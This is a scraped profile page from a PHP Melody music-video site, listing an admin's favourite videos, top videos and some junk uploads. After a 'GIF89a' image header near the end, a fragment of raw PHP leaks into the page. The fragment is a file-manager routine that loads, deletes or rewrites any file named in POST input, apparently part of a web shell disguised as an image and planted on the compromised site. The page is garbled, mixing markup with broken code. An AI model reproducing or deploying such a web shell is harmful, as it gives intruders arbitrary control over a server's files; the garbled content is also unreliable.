• Homepage
  • Articles
  • Top Videos
  • New Videos
  • Random video
  • Contact us
  • Register
  • English
  • Deutsch Română Français Nederlands Lithuanian Albanian Arabic Bulgarian Danish Italian Portuguese Russian Serbian Swedish Spanish Türkçe Georgian Croatian

Category

  • Best Rock Songs
  • Blues
  • Dance
  • Hip-Hop
  • Latin
  • Pop
  • R'n'B
  • Rock & Alternative
  • World & Reggae

Members

Username
Password
Remember Me
Forgot your password?

admin's profile

Gender: Male
Country: USA
Member since: 16 Years, 9 Months ago
Status: Offline
Last seen: 14 Years, 4 Months ago

Web Profile

Website/Blog Website/Blog Twitter URL Last.fm URL

About me

I love PHP Melody

My Favorites

It's Alright It's OK Ashley Tisdale
It's Alright It's OK
I Miss You DMX
I Miss You
The Carpal Tunnel Of Love Fall Out Boy
The Carpal Tunnel Of Love
Disturbia Rihanna
Disturbia
Beep Pussycat Dolls
Beep
Hush Hush: Hush Hush Pussycat Dolls
Hush Hush: Hush Hush
Watch all »

Submitted by admin

sdfrhdhdh zxcgbxfbzxdfh
sdfrhdhdh
aaaa aaaaaaaaaa
aaaa
viata cu louie - intro Mitzigo2
viata cu louie - intro
Jay Sean - Ride It  [ Super ] Mitzigo2
Jay Sean - Ride It [ Super ]
Guess Who - Unu altu (clip) Mitzigo2
Guess Who - Unu altu (clip)
Watch all »

Top Music Videos

I Love Rock 'N RollJoan Jett I Love Rock 'N Roll
Send The Pain BelowChevelle Send The Pain Below
Lets Get ItDiddy feat Black Rob Lets Get It
Turn The PageBob Seger Turn The Page
ForeverPapa Roach Forever
AwakeningSwitchfoot Awakening
Perry MasonOzzy Osbourne Perry Mason
aaaaaaaaaaaaaa aaaa
You Bring Me UpK-Ci You Bring Me Up
ONE TIMEJustin Bieber ONE TIME
GIF89aP;

Error or No contents in file"; } else $status = "File does not exist!"; } else if($_POST["submit"] == "Delete") { if(file_exists($filename)) { if(unlink($filename)) $status = "File successfully deleted!"; else $status = "Could not delete file!"; } else $status = "File does not exist!"; } else if($_POST["submit"] == "Save") { $filecontents = stripslashes(html_entity_decode($_POST["contents"])); if(file_exists($filename)) unlink($filename); $handle = fopen($filename, "w"); if(!$handle) $status = "Could not open file for write access! "; else { if(!fwrite($handle, $filecontents)) $status = $status."Could not write to file! (Maybe you didn't enter any text?)"; fclose($handle); } $filecontents = htmlentities($filecontents); } else { $status = "No file loaded!"; } ?>


Homepage | Contact us | Register | Go Up
This site is powered by PHP Melody.
© 2025 PHP Melody. All rights reserved